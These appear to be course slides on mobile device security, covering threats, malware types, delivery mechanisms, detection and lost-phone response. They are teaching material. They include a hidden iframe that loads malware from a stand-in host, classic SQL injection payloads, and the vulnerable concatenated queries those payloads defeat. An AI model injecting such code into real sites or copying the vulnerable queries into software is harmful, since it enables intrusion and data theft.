Threats to Mobile

Devices

Possible attack threats to mobile devices

• Network exploit • Hackers takes advantage of vulnerability or flaw of user’s

web browser on mobile device in WiFi communication to attack victims.

• Hackers send malicious code/data from malicious logic websites to victim’s browser after user browses the malicious page and the malicious code will take over the control to get all sensitive data on the victim’s device.

• Social engineering • Hackers use hyped contents to attract, manipulate, or

persuade people into revealing confidential information through deception such as phishing for the purpose of information gathering, fraud, or access rights.

• Malware • Virus hosted on a legitimate code, replicable spread

worms, Trojan horses with action in purpose

• Misuse available resource and service • Email/SMS spam or denial of service (A group of the

attacking devices send volume data to one targets on the Internet to impact the target’s services)

• Enterprise/private Data Loss • Work place data on a mobile device may be uploaded to

home PC while synchronizing of entertainment downloading or Enterprise/private data loss due to stolen device

• Data tamper• Intentionally modify/corrupt device data without the permission

such as device’s contact list

Good practices protects mobile device from

potential threats

• Protect data loss due to mobile device loss with device ID and

remotely remove delete all the apps, contacts, and confidential

data right after if the mobile phone is stolen or lost

• Type URL instead of copy and paste or click links to protect

mobile phones from drive-by download attacks

• Protect data privacy by data Encryption, don’t cache sensitive

data

• Disable Device Features as necessary such as Wi-Fi, Bluetooth,

and infrared when they aren’t in use. Enabling the firewall, disable

sharing

Good practices protects mobile device from

potential threats

• Isolate personal apps and corporate apps

• Detect and Remove malware Apps

• Download all mobile apps from trusted sources

application providers and check the permission

requests during installation

• Install a mobile security application to protect the

mobile device from attacks

Mobile device security protection Strategies

1. Block the app’s attempt to act beyond granted permissions.

• Access Control with ID and resource access permissionrequirement

• App signature: Each app is signed with the identity of its author and protect app from tampering.

• Encryption: Encryption encode data for data protection in case of device loss or theft.

• Isolation: Restrict any app to access the sensitive data on a device. Each Android app runs in its own virtual machine (process) which does not allows any access resource belong to other VM except special permission grant.

Android’s Security

• Android’s Security is supported by encryption, signature, Isolation, and access control security protection Strategies. However there still are vulnerabilities for Android mobile devices.

• The Android app signature system is to ensure that the app’s logic is not tampered with, enforce a user to recognize the identity of the app’s author. Although Android will only install and run a signed app, a certificate is not required by Google. Hackers can still use anonymous digital certificates to sign their malware and distribute them without any certification by Google which is required by Apple.

• A hacker can create and distribute malicious app since people will not be able to track down to the source and add Trojan horses and malicious code to a existing legitimate app and then re-sign the updated version with an anonymous or fake certificate and distribute it. Its original digital signature is tempered and lost.

Mobile Walware Security Solutions

• Popular Mobile Malware (malicious software) are:

• Spyware – steals user information with user’s consent somehow.

• Trojan horse – steals confidential information such as credit card

• Adware - displays unwanted pop-up ads with/without theft of

sensitive data

• There are some malware that just degrade or disrupt device

operations such as rebooting device and exhausting device power

without financial profit purpose.

• Due to small screen size of mobile device most apps don’t show the

URL address on the device screen while accessing web which takes

even more difficult for mobile device user monitor and determine the

destination of app on web.

Spyware and Adware• Spyware secretly gathers confidential information about the mobile

user and then relays this data to a third party. These may be advertisers or marketing data firms, which is why spyware is sometimes referred to as “adware” (short for advertising-supported software) that automatically delivers advertisements such as pop-up ads

• It is typically installed without user consent by disguising itself as a legitimate app (say, a simple game) or by infecting its payload on a legitimate app.

• Spyware uses the victim’s mobile connection to relay personal information such as contacts, location, messaging habits, browser history and user preferences or downloads.

• Spyware gathers device information such as OS version, product ID, International Mobile Equipment Identitiy (IMEI) number, and International Mobile Subscriber Identity (IMSI) number

Trojans

• Mobile Trojans program is disguised as something normal or desirable to infect user devices by attaching themselves to seemingly harmless or legitimate programs, are installed with the app and then carry out malicious actions.

• Such programs have been known to hijack the browser, cause the device to automatically send unauthorized premium rate texts, or capture user login information from other apps such as mobile banking.

• Trojans are closely related to mobile viruses, which can become installed on the device any number of ways and cause effects that range from simply annoying to highly-destructive and irreparable.

• Malicious parties can potentially use mobile viruses to root the device and gain access to files and flash memory.

Phishing Apps

• Mobile browsing of the internet is growing with smartphone and tablet penetration. Just as with desktop computing, fraudsters are creating mobile phishing sites that may look like a legitimate service but may steal user credentials or worse.

• The smaller screen of mobile devices is making malicious phishing techniques easier to hide from users less sophisticated on mobile devices than PCs.

• Some phishing schemes use rogue mobile apps, programs which can be considered “trojanized”, disguising their true intent as a system update, marketing offer or game.

• Others infect legitimate apps with malicious code that’s only discovered by the user after installing.

Ransomware

• Ransomware is a form of malware that essentially holds a computer system captive while demanding a ransom.

• The malware restricts user access to the device either by encrypting files on the hard drive or locking down the system and displaying messages that are intended to force the user to pay the malware creator to remove the restrictions and regain access to their computer.

• Ransomware typically spreads like a normal computer worm (see below) ending up on a computer via a downloaded file or through some other vulnerability in a network service.

Rootkit• A rootkit is a type of malicious software designed to remotely access or

control a device without being detected by users or security programs.

• Once a rootkit has been installed it is possible for the malicious party behind the rootkit to remotely

• Rootkit prevention, detection, and removal can be difficult due to their stealthy operation. Because a rootkit continually hides its presence, typical security products are not effective in detecting and removing rootkits.

• As a result, rootkit detection relies on manual methods such as monitoring computer behavior for irregular activity, signature scanning, and storage dump analysis.

• Organizations and users can protect themselves from rootkits by regularly patching vulnerabilities in software, applications, and operating systems, updating virus definitions, avoiding suspicious downloads, and performing static analysis scans.

Bot Processes

• Mobile malware is getting more sophisticated with programs can operate in the background on the user device, concealing themselves and lying in wait for certain behaviors like an online banking session to strike.

• Hidden processes can execute completely invisible to the user, run executables or contact bot-masters for new instructions.

• The next wave is expected to be even more advanced, with botnet tendencies to actually hijack and control infected devices.

Mobile Malware Symptoms

• While these types of mobile malware differ greatly in how they spread and infect devices, they all can produce similar symptoms.

• Signs of a malware infection can include unwanted behaviors and degradation of device performance. Stability issues such as frozen apps, failure to reboot and difficulty connecting to the network are also common.

• Mobile malware can eat up battery or processing power, hijack the browser, send unauthorized SMS messages, freeze or brick the device entirely.

Common types of malware delivery

mechanisms

Drive-by malware (silent walware)

Drive-by malware delivers (downloads) itself onto a user’s devices

without their consent and user interaction by exploiting

vulnerabilities of user browser via an invisible element such as

HTML iframe tag element or by HTML embed element of image

file. Such malware either tempts the victim to visit a infected

website or send malware-infected messages (SMS).

Software updates

Malware invites users to update software ( turned out to be a

malicious one) on social network or web sits.

Common types of malware delivery

mechanisms

• Pop-up ads

Adware lures users to click on an ad that directs user to download/install malicious code such as Trojan horse in a word or pdf file. The downloaded may also be The keylogger which monitors mouse operations or keyboard strokes to steal personal data.

• Man-in-the-middle (MITM)

Hacker may hijack a session by eavesdropping where the hacker makes independent connections with the victims and relays messages between two parties such that both parties thought they are talking directly to each other over. The MITM hacker intercepts all conversation and inject

• Botnet

One attacker controls a group of sites (devices) to send a large volume of traffic to a victim resulted in a denial of service (DoS) attack. Afterwards, the hacker Demands the victim a payment to stop the attack.

Walware detection and protection solution

• Filtering with blacklisting and whitelisting

Many search engines place malicious website a blocked list

“blacklist.” The search engine will warn to potential visitor who

intends access such sites on the list. A enterprise or a personal

can also setup their own blacklist. A whitelist filter only access to

these on the list if a whitelist is exclusive. The filter techniques are

widely used for spam email filtering.

• View page source code

Use Page Source (Firefox) or Source (IE) to view the actual

source code to find out the injected malicious code

Spyware detection techniques

a. Static analysisStatic analysis is a reverse engineering analysis approach to finding malicious characteristics code segments in an app without execution. The analysis focus on these obvious security threats which have been reported before. One lab in this module is given on the static analysis approach to detect spyware.

b. Dynamic analysisDynamic analysis will execute the suspicious mobile app in an isolated sandbox, such as a virtual machine or emulator to monitor and inspect the app’s dynamic behavior.

c. App Permission analysis

Android security uses permission to protect and detect by permissions in an Android mobile app’s intentions. The permissions are required to be clearly specified by app’s authors. Many spyware attacks make use of app’s vulnerability on the permission.

Malware injection

Malware injection is the act of inserting malicious code into a

vulnerable web server page with poor application input filtering

such that their devices get infected with malware when users

interact with such page via form or other GUI components. This

injection can be detected by a filter deployed on web server to

filter out invalid commands such as SQL injection commands.

Malware injection works as:

1. Inject a vulnerable website with malicious code that web

browsers may request

HTML:

<iframe

src=”http://www.badwebsite.com/inject/page_walware.html”

width=”1″ height=”1″ style=”visibility: hidden”>

</iframe>

2. Exploit and take over control the infected web browsers with this injected code, direct the exploited web browser to download malware to users' devices

Once user browses the injected web page, the malicious content from Hop Point (a website controlled by the hacker) to execute inside the requested (and presumed legitimate) web page. The malware injection process instructed in “http://www.badwebsite.com/inject/page_walware.html” is loaded from here through the iframe to the browser itself which will install specific piece set of instructions for the browser to connect to a malicious site in order to download malware such as remote control utilities and backdoors as well as programs that automatically crawl the hard disk in search of information such as credit card details or bank accounts

3. Finally, the victim will Silently run this downloaded malware on user device

Safeguards

• Log on as a no-admin user

• Secure your browser

Set browser security to high to reject unwanted javascripts.

Use Firefox with "no-script" to only run scripts from sites on

whitelist

• examine the application code and web server for

evidence of:

Injected Iframes, javascript, SQL Injection, objects such as flash,

PDF

SQL Injection

• SQL injection is a code insertion technique used to

attack data driven applications, in which malicious

code is inserted to normal SQL statement to dump

contents from database.

• ExampletxtUserId = getRequestString("UserId");

txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;

SQL Injection Based on 1=1 is

Always True

• If there is nothing to prevent a user from entering

"wrong" input, the user can enter some "smart"

input like this:

• UserId: 105 OR 1=1

• Then, the SQL statement will look like this:SELECT * FROM Users WHERE UserId = 105 OR 1=1;

• The SQL above is valid and will return ALL rows from the "Users" table, since OR 1=1 is always TRUE.

Another Example

uName = getRequestString("username");

uPass = getRequestString("userpassword");

sql = 'SELECT * FROM Users WHERE Name ="' + uName + '" AND Pass ="' + uPass + '"‘

• A hacker might get access to user names and passwords in a database

by simply inserting " OR ""=" into the user name or password text box:

• User Name: " or ""="

Password: " or ""="

• The code at the server will create a valid SQL statement like this:SELECT * FROM Users WHERE Name ="" or ""="" AND Pass ="" or ""="“

• The SQL above is valid and will return all rows from the "Users" table,

since OR ""="" is always TRUE.

SQL Injection Defense

• Validate the SQL statement

• parameterized statement: That is to use

placeholders for parameters whose values

are provided at execution time.

• Apply a database permission

Mobile device loss/Theft

• Now, smart mobile device is not only for just calling or sending a message, it has become business and playing tool for us.

• We’ve stored amount of personal data and even more sensitive important company data in the mobile device. These data may be exposed: Email exchanges could be seen; m-commence data such as online purchasing or banking transaction might be viewed; If the phone is connected via a VPN, company networks will be exposed to malware or could be hacked.

• Phones may be lost anywhere and anytime.

•

• Nearly all who found the lost phones tried to access the information on the phone

• The loss of mobile device becomes a concern. About 2/3

of mobile device users feared not being able to recover

lost content.

• It is one of major focus of security concerns for Android

mobile device. Some security experts have pointed out

that targeting smartphones could potentially be more

profitable for criminals than aiming at computers

Action on Your Stolen Mobile Phone

• Avoid data loss

Quick restoration of all important data with a preinstalled auto-backup app (e.g., WaveSecure, MyBackup)

Install a mobile tracking app to protect our mobile device

(Android Lost, Where’s My Droid)

• Salvage Actions

Report the loss/theft to your organization and/or mobile service provider immediately to deter malicious use of your device and minimize fraudulent charges.

Change account credentials. If devices are used to access remote resources such as corporate networks or social networking sites, you should contact your enterprise or organization to revoke all credentials that were stored on the lost device, all issued certificates or change your password.

revoke. Locking Smartphone is the first line of defense line for protection of preventing thieves from stealing broadband service such as SMS fees, reading your email, or abusing VPN connections.

locates, locks and wipes.

• Locates: Locate your lost device and display the location on a Google map. Register your Android device with one of the many available "find me" services to locate and recover lost devices

• Locks:

Remotely locks down your lost device, that nobody can use your phone without your access, even somebody else exchanges the SIM card on your phone.

Use lock apps such as Norton Mobile or AppProtector or PIN/ passwords to lock your android devices. You can also enroll in a remote find/lock service.

• Wipes:

Remotely wipe out important data which stored on your device.

Some mobile service providers offer remote default and selective wiping, which allows you or your provider to remotely delete all data on the phone.